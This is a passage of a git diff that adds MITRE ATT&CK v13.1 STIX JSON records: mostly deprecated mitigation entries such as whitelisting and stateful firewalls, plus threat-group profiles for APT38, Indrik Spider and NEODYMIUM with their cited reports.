"bundle--31b1b938-47b7-4dcf-a48e-3da903ee2542", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--f6b7c116-0821-4eb7-9b24-62bd09b3e575", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1205", + "external_id": "T1205" + } + ], + "modified": "2019-07-25T11:25:50.338Z", + "name": "Port Knocking Mitigation", + "description": "Mitigation of some variants of this technique could be achieved through the use of stateful firewalls, depending upon how it is implemented.", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--f9b3e5d9-7454-4b7d-bce6-27620e19924e.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--f9b3e5d9-7454-4b7d-bce6-27620e19924e.json new file mode 100644 index 0000000000000000000000000000000000000000..611501eb8ec5978257787c76406ca3a1d1c748eb --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--f9b3e5d9-7454-4b7d-bce6-27620e19924e.json @@ -0,0 +1,62 @@ +{ + "type": "bundle", + "id": "bundle--f3162000-a771-4818-bb05-ab1900bf8ac7", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--f9b3e5d9-7454-4b7d-bce6-27620e19924e", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "T1108", + "url": "https://attack.mitre.org/mitigations/T1108", + "source_name": "mitre-attack" + }, + { + "source_name": "Beechey 2010", + "description": "Beechey, J. (2010, December). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.", + "url": "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599" + }, + { + "url": "https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html", + "description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.", + "source_name": "Windows Commands JPCERT" + }, + { + "url": "https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm", + "description": "NSA Information Assurance Directorate. (2014, August). Application Whitelisting Using Microsoft AppLocker. Retrieved March 31, 2016.", + "source_name": "NSA MS AppLocker" + }, + { + "source_name": "Corio 2008", + "description": "Corio, C., & Sayana, D. P. (2008, June). Application Lockdown with Software Restriction Policies. Retrieved November 18, 2014.", + "url": "http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx" + }, + { + "source_name": "TechNet Applocker vs SRP", + "description": "Microsoft. (2012, June 27). Using Software Restriction Policies and AppLocker Policies. Retrieved April 7, 2016.", + "url": "https://technet.microsoft.com/en-us/library/ee791851.aspx" + }, + { + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "source_name": "University of Birmingham C2" + } + ], + "modified": "2021-08-23T20:25:18.593Z", + "name": "Redundant Access Mitigation", + "description": "Identify and block potentially malicious software that may be used as a remote access tool, and audit and/or block it by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)\n\nNetwork intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and will be different across various malware families and versions. Adversaries will likely change tool signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--f9f9e6ef-bc0a-41ad-ba11-0924e5e84c4c.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--f9f9e6ef-bc0a-41ad-ba11-0924e5e84c4c.json new file mode 100644 index 0000000000000000000000000000000000000000..2471db0efafb6efc9dc39e76d1f62bed0824cfba --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--f9f9e6ef-bc0a-41ad-ba11-0924e5e84c4c.json @@ -0,0 +1,34 @@ +{ + "type": "bundle", + "id": "bundle--b0871b49-93e6-4fd1-b5b4-058b3033cb71", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-21T15:52:18.525Z", + "name": "Account Use Policies", + "description": "Configure features related to account use like login attempt lockouts, specific login times, etc.", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "type": "course-of-action", + "id": "course-of-action--f9f9e6ef-bc0a-41ad-ba11-0924e5e84c4c", + "created": "2019-06-11T16:32:21.854Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M1036", + "external_id": "M1036" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--fae44eea-caa7-42b7-a2e2-0c815ba81b9a.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--fae44eea-caa7-42b7-a2e2-0c815ba81b9a.json new file mode 100644 index 0000000000000000000000000000000000000000..cd5a3fff3732177f626b18a44f842f2f3fe0bdea --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--fae44eea-caa7-42b7-a2e2-0c815ba81b9a.json @@ -0,0 +1,32 @@ +{ + "type": "bundle", + "id": "bundle--6e5fa136-dba8-4089-8a96-5c42c1970ec2", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--fae44eea-caa7-42b7-a2e2-0c815ba81b9a", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1143", + "external_id": "T1143" + } + ], + "modified": "2019-07-24T19:36:50.328Z", + "name": "Hidden Window Mitigation", + "description": "Whitelist programs that are allowed to have this plist tag. All other programs should be considered suspicious.", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--fcbe8424-eb3e-4794-b76d-e743f5a49b8b.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--fcbe8424-eb3e-4794-b76d-e743f5a49b8b.json new file mode 100644 index 0000000000000000000000000000000000000000..e0f7a7560104bde0c8217a2fa30dc6508760569d --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--fcbe8424-eb3e-4794-b76d-e743f5a49b8b.json @@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--d6406779-a55b-43dc-90cd-541ca09ce146", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--fcbe8424-eb3e-4794-b76d-e743f5a49b8b", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1132", + "external_id": "T1132" + }, + { + "source_name": "University of Birmingham C2", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + } + ], + "modified": "2019-07-24T18:25:06.552Z", + "name": "Data Encoding Mitigation", + "description": "Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific obfuscation technique used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--fe0aeb41-1a51-4152-8467-628256ea6adf.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--fe0aeb41-1a51-4152-8467-628256ea6adf.json new file mode 100644 index 0000000000000000000000000000000000000000..5b11c1cb10000e5451aa27359f1bbb93732cca4f --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--fe0aeb41-1a51-4152-8467-628256ea6adf.json @@ -0,0 +1,52 @@ +{ + "type": "bundle", + "id": "bundle--439cff4b-f5fe-49d9-8497-4a61de09b170", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--fe0aeb41-1a51-4152-8467-628256ea6adf", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "T1031", + "url": "https://attack.mitre.org/mitigations/T1031", + "source_name": "mitre-attack" + }, + { + "url": "https://github.com/mattifestation/PowerSploit", + "description": "PowerSploit. (n.d.). Retrieved December 4, 2014.", + "source_name": "Powersploit" + }, + { + "source_name": "Beechey 2010", + "description": "Beechey, J. (2010, December). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.", + "url": "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599" + }, + { + "url": "http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html", + "description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.", + "source_name": "Windows Commands JPCERT" + }, + { + "url": "https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm", + "description": "NSA Information Assurance Directorate. (2014, August). Application Whitelisting Using Microsoft AppLocker. Retrieved March 31, 2016.", + "source_name": "NSA MS AppLocker" + } + ], + "modified": "2020-01-17T16:45:23.126Z", + "name": "Modify Existing Service Mitigation", + "description": "Use auditing tools capable of detecting privilege and service abuse opportunities on systems within an enterprise and correct them. Limit privileges of user accounts and groups so that only authorized administrators can interact with service changes and service configurations. Toolkits like the PowerSploit framework contain the PowerUp modules that can be used to explore systems for Privilege Escalation weaknesses. (Citation: Powersploit)\n\nIdentify and block potentially malicious software that may be executed through service abuse by using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) that are capable of auditing and/or blocking unknown programs.", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--feff9142-e8c2-46f4-842b-bd6fb3d41157.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--feff9142-e8c2-46f4-842b-bd6fb3d41157.json new file mode 100644 index 0000000000000000000000000000000000000000..e116251222c2a1656af217bf566ad7973480edec --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--feff9142-e8c2-46f4-842b-bd6fb3d41157.json @@ -0,0 +1,31 @@ +{ + "type": "bundle", + "id": "bundle--c29f0136-ee04-480c-aa2a-653bfa0b466a", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--feff9142-e8c2-46f4-842b-bd6fb3d41157", + "type": "course-of-action", + "created": "2019-06-11T16:43:44.834Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "M1041", + "url": "https://attack.mitre.org/mitigations/M1041" + } + ], + "modified": "2019-06-11T16:43:44.834Z", + "name": "Encrypt Sensitive Information", + "description": "Protect sensitive information with strong encryption.", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--ff5d862a-ae6b-4833-8c15-e235d654d28e.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--ff5d862a-ae6b-4833-8c15-e235d654d28e.json new file mode 100644 index 0000000000000000000000000000000000000000..4b24a6cd0ca36dd57838ff2732d7f52695c0dcc0 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--ff5d862a-ae6b-4833-8c15-e235d654d28e.json @@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--207e4ea0-f37f-4794-afdb-01a05e093da8", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--ff5d862a-ae6b-4833-8c15-e235d654d28e", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "T1122", + "url": "https://attack.mitre.org/mitigations/T1122", + "source_name": "mitre-attack" + }, + { + "source_name": "Beechey 2010", + "description": "Beechey, J. (2010, December). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.", + "url": "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599" + }, + { + "url": "http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html", + "description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.", + "source_name": "Windows Commands JPCERT" + }, + { + "url": "https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm", + "description": "NSA Information Assurance Directorate. (2014, August). Application Whitelisting Using Microsoft AppLocker. Retrieved March 31, 2016.", + "source_name": "NSA MS AppLocker" + }, + { + "source_name": "Corio 2008", + "description": "Corio, C., & Sayana, D. P. (2008, June). Application Lockdown with Software Restriction Policies. Retrieved November 18, 2014.", + "url": "http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx" + }, + { + "source_name": "TechNet Applocker vs SRP", + "description": "Microsoft. (2012, June 27). Using Software Restriction Policies and AppLocker Policies. Retrieved April 7, 2016.", + "url": "https://technet.microsoft.com/en-us/library/ee791851.aspx" + } + ], + "modified": "2020-01-17T16:45:23.056Z", + "name": "Component Object Model Hijacking Mitigation", + "description": "Direct mitigation of this technique may not be recommended for a particular environment since COM objects are a legitimate part of the operating system and installed software. Blocking COM object changes may have unforeseen side effects to legitimate functionality.\n\nInstead, identify and block potentially malicious software that may execute, or be executed by, this technique using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/enterprise-attack.json b/cti-ATT-CK-v13.1/enterprise-attack/enterprise-attack.json new file mode 100644 index 0000000000000000000000000000000000000000..bb29ff7c89db1a03cf8c17f0c9abeb3357310cb1 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/enterprise-attack.json @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:02f3755e4260c81318b1dfdca57451228f7a09c9beff9839ed67e24327ea3933 +size 27944639 diff --git a/cti-ATT-CK-v13.1/enterprise-attack/identity/identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5.json b/cti-ATT-CK-v13.1/enterprise-attack/identity/identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5.json new file mode 100644 index 0000000000000000000000000000000000000000..2998775361204321e17e480cdaa7a8322b1c134c --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/identity/identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5.json @@ -0,0 +1,18 @@ +{ + "type": "bundle", + "id": "bundle--74668457-0e6f-4650-8b90-f711ee07ffa5", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "type": "identity", + "identity_class": "organization", + "created": "2017-06-01T00:00:00.000Z", + "modified": "2017-06-01T00:00:00.000Z", + "name": "The MITRE Corporation" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--00f67a77-86a4-4adf-be26-1a54fc713340.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--00f67a77-86a4-4adf-be26-1a54fc713340.json new file mode 100644 index 0000000000000000000000000000000000000000..207680539104c86fd46ae3e23303c7d592952eff --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--00f67a77-86a4-4adf-be26-1a54fc713340.json @@ -0,0 +1,94 @@ +{ + "type": "bundle", + "id": "bundle--1eb70160-9248-4f68-af0e-f5408905717d", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "APT38", + "NICKEL GLADSTONE", + "BeagleBoyz", + "Bluenoroff", + "Stardust Chollima" + ], + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--00f67a77-86a4-4adf-be26-1a54fc713340", + "type": "intrusion-set", + "created": "2019-01-29T21:27:24.793Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "G0082", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0082" + }, + { + "source_name": "APT38", + "description": "(Citation: FireEye APT38 Oct 2018)" + }, + { + "source_name": "NICKEL GLADSTONE", + "description": "(Citation: SecureWorks NICKEL GLADSTONE profile Sept 2021)" + }, + { + "source_name": "BeagleBoyz", + "description": "(Citation: CISA AA20-239A BeagleBoyz August 2020)" + }, + { + "source_name": "Bluenoroff", + "description": "(Citation: Kaspersky Lazarus Under The Hood Blog 2017)" + }, + { + "source_name": "Stardust Chollima", + "description": "(Citation: CrowdStrike Stardust Chollima Profile April 2018)(Citation: CrowdStrike GTR 2021 June 2021)" + }, + { + "source_name": "CISA AA20-239A BeagleBoyz August 2020", + "url": "https://us-cert.cisa.gov/ncas/alerts/aa20-239a", + "description": "DHS/CISA. (2020, August 26). FASTCash 2.0: North Korea's BeagleBoyz Robbing Banks. Retrieved September 29, 2021." + }, + { + "source_name": "FireEye APT38 Oct 2018", + "url": "https://content.fireeye.com/apt/rpt-apt38", + "description": "FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved November 6, 2018." + }, + { + "source_name": "DOJ North Korea Indictment Feb 2021", + "url": "https://www.justice.gov/opa/pr/three-north-korean-military-hackers-indicted-wide-ranging-scheme-commit-cyberattacks-and", + "description": "Department of Justice. (2021, February 17). Three North Korean Military Hackers Indicted in Wide-Ranging Scheme to Commit Cyberattacks and Financial Crimes Across the Globe. Retrieved June 9, 2021." + }, + { + "description": "GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April 17, 2019.", + "url": "https://securelist.com/lazarus-under-the-hood/77908/", + "source_name": "Kaspersky Lazarus Under The Hood Blog 2017" + }, + { + "source_name": "SecureWorks NICKEL GLADSTONE profile Sept 2021", + "url": "https://www.secureworks.com/research/threat-profiles/nickel-gladstone", + "description": "SecureWorks. (2021, September 29). NICKEL GLADSTONE Threat Profile. Retrieved September 29, 2021." + }, + { + "source_name": "CrowdStrike Stardust Chollima Profile April 2018", + "url": "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-april-stardust-chollima/", + "description": "Meyers, Adam. (2018, April 6). Meet CrowdStrike\u2019s Adversary of the Month for April: STARDUST CHOLLIMA. Retrieved September 29, 2021." + }, + { + "source_name": "CrowdStrike GTR 2021 June 2021", + "url": "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "description": "CrowdStrike. (2021, June 7). CrowdStrike 2021 Global Threat Report. Retrieved September 29, 2021." + } + ], + "modified": "2022-01-18T17:13:14.610Z", + "name": "APT38", + "description": "[APT38](https://attack.mitre.org/groups/G0082) is a North Korean state-sponsored threat group that specializes in financial cyber operations; it has been attributed to the Reconnaissance General Bureau.(Citation: CISA AA20-239A BeagleBoyz August 2020) Active since at least 2014, [APT38](https://attack.mitre.org/groups/G0082) has targeted banks, financial institutions, casinos, cryptocurrency exchanges, SWIFT system endpoints, and ATMs in at least 38 countries worldwide. Significant operations include the 2016 Bank of Bangladesh heist, during which [APT38](https://attack.mitre.org/groups/G0082) stole $81 million, as well as attacks against Bancomext (2018) and Banco de Chile (2018); some of their attacks have been destructive.(Citation: CISA AA20-239A BeagleBoyz August 2020)(Citation: FireEye APT38 Oct 2018)(Citation: DOJ North Korea Indictment Feb 2021)(Citation: Kaspersky Lazarus Under The Hood Blog 2017)\n\nNorth Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://attack.mitre.org/groups/G0032) instead of tracking clusters or subgroups.", + "x_mitre_version": "2.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--01e28736-2ffc-455b-9880-ed4d1407ae07.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--01e28736-2ffc-455b-9880-ed4d1407ae07.json new file mode 100644 index 0000000000000000000000000000000000000000..8c8bafdc61fcb2c6f5b457eff2b77b24df7dfe7a --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--01e28736-2ffc-455b-9880-ed4d1407ae07.json @@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--bd5a1953-2ab8-42dd-ac9f-12316e053970", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-09-15T19:49:18.799Z", + "name": "Indrik Spider", + "description": "[Indrik Spider](https://attack.mitre.org/groups/G0119) is a Russia-based cybercriminal group that has been active since at least 2014. [Indrik Spider](https://attack.mitre.org/groups/G0119) initially started with the [Dridex](https://attack.mitre.org/software/S0384) banking Trojan, and then by 2017 they began running ransomware operations using [BitPaymer](https://attack.mitre.org/software/S0570), [WastedLocker](https://attack.mitre.org/software/S0612), and Hades ransomware.(Citation: Crowdstrike Indrik November 2018)(Citation: Crowdstrike EvilCorp March 2021)(Citation: Treasury EvilCorp Dec 2019)", + "aliases": [ + "Indrik Spider", + "Evil Corp" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "2.1", + "type": "intrusion-set", + "id": "intrusion-set--01e28736-2ffc-455b-9880-ed4d1407ae07", + "created": "2021-01-06T17:46:35.134Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0119", + "external_id": "G0119" + }, + { + "source_name": "Evil Corp", + "description": "(Citation: Crowdstrike EvilCorp March 2021)(Citation: Treasury EvilCorp Dec 2019)" + }, + { + "source_name": "Crowdstrike Indrik November 2018", + "description": "Frankoff, S., Hartley, B. (2018, November 14). Big Game Hunting: The Evolution of INDRIK SPIDER From Dridex Wire Fraud to BitPaymer Targeted Ransomware. Retrieved January 6, 2021.", + "url": "https://www.crowdstrike.com/blog/big-game-hunting-the-evolution-of-indrik-spider-from-dridex-wire-fraud-to-bitpaymer-targeted-ransomware/" + }, + { + "source_name": "Crowdstrike EvilCorp March 2021", + "description": "Podlosky, A., Feeley, B. (2021, March 17). INDRIK SPIDER Supersedes WastedLocker with Hades Ransomware to Circumvent OFAC Sanctions. Retrieved September 15, 2021.", + "url": "https://www.crowdstrike.com/blog/hades-ransomware-successor-to-indrik-spiders-wastedlocker/" + }, + { + "source_name": "Treasury EvilCorp Dec 2019", + "description": "U.S. Department of Treasury. (2019, December 5). Treasury Sanctions Evil Corp, the Russia-Based Cybercriminal Group Behind Dridex Malware. Retrieved September 15, 2021.", + "url": "https://home.treasury.gov/news/press-releases/sm845" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--025bdaa9-897d-4bad-afa6-013ba5734653.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--025bdaa9-897d-4bad-afa6-013ba5734653.json new file mode 100644 index 0000000000000000000000000000000000000000..9ed088a320f91f1640a941475e5f5c1a1f6c3f9a --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--025bdaa9-897d-4bad-afa6-013ba5734653.json @@ -0,0 +1,53 @@ +{ + "type": "bundle", + "id": "bundle--6b101dc5-c6ae-423f-b495-6f4b60927427", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "NEODYMIUM" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--025bdaa9-897d-4bad-afa6-013ba5734653", + "type": "intrusion-set", + "created": "2018-01-16T16:13:52.465Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0055", + "external_id": "G0055" + }, + { + "source_name": "NEODYMIUM", + "description": "(Citation: Microsoft NEODYMIUM Dec 2016) (Citation: Microsoft SIR Vol 21)" + }, + { + "url": "https://blogs.technet.microsoft.com/mmpc/2016/12/14/twin-zero-day-attacks-promethium-and-neodymium-target-individuals-in-europe/", + "description": "Microsoft. (2016, December 14). Twin zero-day attacks: PROMETHIUM and NEODYMIUM target individuals in Europe. Retrieved November 27, 2017.", + "source_name": "Microsoft NEODYMIUM Dec 2016" + }, + { + "source_name": "Microsoft SIR Vol 21", + "description": "Anthe, C. et al. (2016, December 14). Microsoft Security Intelligence Report Volume 21. Retrieved November 27, 2017.", + "url": "http://download.microsoft.com/download/E/B/0/EB0F50CC-989C-4B66-B7F6-68CD3DC90DE3/Microsoft_Security_Intelligence_Report_Volume_21_English.pdf" + }, + { + "url": "https://www.cyberscoop.com/middle-eastern-hacking-group-using-finfisher-malware-conduct-international-espionage/", + "description": "Bing, C. (2017, October 16). Middle Eastern hacking group is using FinFisher malware to conduct international espionage. Retrieved February 15, 2018.", + "source_name": "CyberScoop BlackOasis Oct 2017" + } + ], + "modified": "2019-03-25T14:31:40.855Z", + "name": "NEODYMIUM", + "description": "[NEODYMIUM](https://attack.mitre.org/groups/G0055) is an activity group that conducted a campaign in May 2016 and has heavily targeted Turkish victims. The group has demonstrated similarity to another activity group called [PROMETHIUM](https://attack.mitre.org/groups/G0056) due to overlapping victim and campaign characteristics. (Citation: Microsoft NEODYMIUM Dec 2016) (Citation: Microsoft SIR Vol 21) [NEODYMIUM](https://attack.mitre.org/groups/G0055) is reportedly associated closely with 